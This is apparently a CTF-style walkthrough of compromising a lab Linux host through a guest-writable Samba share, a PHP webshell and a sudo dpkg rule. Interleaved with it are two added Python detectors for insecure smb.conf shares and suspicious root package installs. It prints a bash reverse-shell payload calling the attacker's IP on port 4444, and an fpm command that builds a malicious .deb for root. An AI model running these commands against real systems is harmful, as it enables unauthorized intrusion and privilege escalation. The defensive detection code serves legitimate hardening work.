1. get first reverse shell

Visit port 80; the page http://192.168.85.135/index.php/2021/06/27/hola-mundo/ gives us a hint.


Use enum4linux to enumerate the Samba shares; then we get the directory tester, which we can visit without a user and password.

Following the hint, we put test.txt into this share using smbclient; after a moment, we get the first reverse shell.
test.txt
# Python 2: the commands module was removed in Python 3
import commands
commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.85.129/4444 0>&1"')
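The root cause of this step is a share that is both guest-accessible and writable. The following is an added defensive example, not code from the writeup: it parses an smb.conf and flags shares where anonymous users can write, handling the Samba synonyms "public"/"guest ok", "writable"/"writeable" and "read only". The sample configuration is constructed for illustration; the share name "tester" is taken from the writeup, the paths are made up.

```python
import configparser

# Constructed sample smb.conf (illustration only, not the target's real config).
SAMPLE_SMB_CONF = """
[global]
workgroup = WORKGROUP
map to guest = Bad User

[tester]
path = /srv/samba/tester
guest ok = yes
writable = yes
browseable = yes

[docs]
path = /srv/samba/docs
public = yes
read only = yes

[staff]
path = /srv/samba/staff
valid users = @staff
read only = no
"""

TRUE_VALUES = {"yes", "true", "1"}
SPECIAL_SECTIONS = {"global", "homes", "printers"}


def _truthy(value):
    return value.strip().lower() in TRUE_VALUES


def _flag(section, *synonyms, default=False):
    """Return the boolean value of the first synonym present, else the Samba default."""
    for key in synonyms:
        if key in section:
            return _truthy(section[key])
    return default


def parse_smb_conf(text):
    # smb.conf is INI-like: keys may contain spaces, '%' is not interpolation,
    # and keys are case-insensitive (configparser lowercases them by default).
    parser = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    parser.read_string(text)
    return parser


def find_anonymous_writable_shares(text):
    """Return (share name, path) for every share a guest can write to."""
    parser = parse_smb_conf(text)
    findings = []
    for name in parser.sections():
        if name.lower() in SPECIAL_SECTIONS:
            continue
        share = parser[name]
        guest = _flag(share, "guest ok", "public")            # Samba default: no
        if "read only" in share:
            # "read only" is the canonical form; "writable" is its inverse synonym.
            writable = not _truthy(share["read only"])
        else:
            writable = _flag(share, "writable", "writeable")   # Samba default: read only
        if guest and writable:
            findings.append((name, share.get("path", "?")))
    return findings


if __name__ == "__main__":
    for share, path in find_anonymous_writable_shares(SAMPLE_SMB_CONF):
        print(f"anonymous write access: [{share}] -> {path}")
```

Run against a live host with the text of /etc/samba/smb.conf; any share reported here should either require authentication or be made read-only, and a directory that gets polled and executed by a script should never be reachable this way.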

2. get root
Checking the process list, we can see that the user webservices runs PHP on localhost.

We use the tool venom to forward localhost port 8080 to port 8888 on the attacking machine.

Upload a webshell via upload.php.


Because of disable_functions, you cannot use a terminal directly. You can use php7_userfilter to bypass it, but here you do not need to.

Check the files owned by the user webservices.

We find that /opt/logs/log.txt is modified by /opt/website.py at intervals, so we change the file to spawn a new reverse shell.

Then we get the new user's shell.

Checking sudo -l, we find dpkg -i [1]. Build a crafted deb with fpm and we get root.
TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
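A sudo rule allowing dpkg -i is equivalent to root, because package maintainer scripts run as root. The following is an added detection example, not part of the writeup: it parses sudo entries in syslog-style auth.log lines and alerts when a package is installed as root from a user-writable location such as /tmp. The log lines are constructed for illustration; the host name "box", the user names and the .deb paths are made up.

```python
import os
import re

# Constructed sample auth.log lines in the format sudo writes via syslog.
SAMPLE_AUTH_LOG = """\
Jun 27 10:01:12 box sudo:   alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt-get update
Jun 27 10:02:40 box sudo: webservices : TTY=pts/1 ; PWD=/tmp/tmp.Q1w2e3 ; USER=root ; COMMAND=/usr/bin/dpkg -i /tmp/tmp.Q1w2e3/x_1.0_all.deb
Jun 27 10:03:05 box sudo: webservices : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/dpkg -l
Jun 27 10:04:00 box sudo:     bob : TTY=pts/2 ; PWD=/var/cache/apt/archives ; USER=root ; COMMAND=/usr/bin/dpkg -i curl_7.74.0-1_amd64.deb
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>[^;]+?) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# dpkg modes that unpack the archive and run its maintainer scripts as root.
INSTALL_FLAGS = ("-i", "--install", "--unpack")
# Locations an unprivileged user can normally write to.
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_sudo_line(line):
    """Return the fields of a sudo log line as a dict, or None if it is not one."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    event = m.groupdict()
    event["argv"] = event["cmd"].split()
    return event


def is_untrusted_package_install(event):
    """True if the command installs a .deb that lives under a user-writable prefix."""
    argv = event["argv"]
    if not argv or os.path.basename(argv[0]) != "dpkg":
        return False
    if not any(arg in INSTALL_FLAGS for arg in argv[1:]):
        return False
    for arg in argv[1:]:
        # A relative package path resolves against the PWD recorded by sudo.
        path = arg if arg.startswith("/") else os.path.join(event["pwd"], arg)
        if path.endswith(".deb") and path.startswith(UNTRUSTED_PREFIXES):
            return True
    return False


def detect(log_text):
    """Return (user, command) for every root package install from an untrusted path."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_sudo_line(line)
        if event and event["runas"] == "root" and is_untrusted_package_install(event):
            alerts.append((event["user"], event["cmd"]))
    return alerts


if __name__ == "__main__":
    for user, cmd in detect(SAMPLE_AUTH_LOG):
        print(f"ALERT: {user} installed a package from a user-writable path: {cmd}")
```

The bob line is not flagged because /var/cache/apt/archives is root-owned; the real fix is removing the dpkg rule from sudoers, since no path filter can make dpkg -i safe to delegate.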

3. references
- https://gtfobins.github.io/gtfobins/dpkg/
This article describes in detail the process of a penetration test: obtaining a hint over HTTP, using enum4linux to enumerate Samba shares, uploading a webshell through PHP to obtain a reverse shell, and then finding and exploiting system weaknesses to escalate privileges to root. Tools and techniques involved include smbclient, venom and dpkg.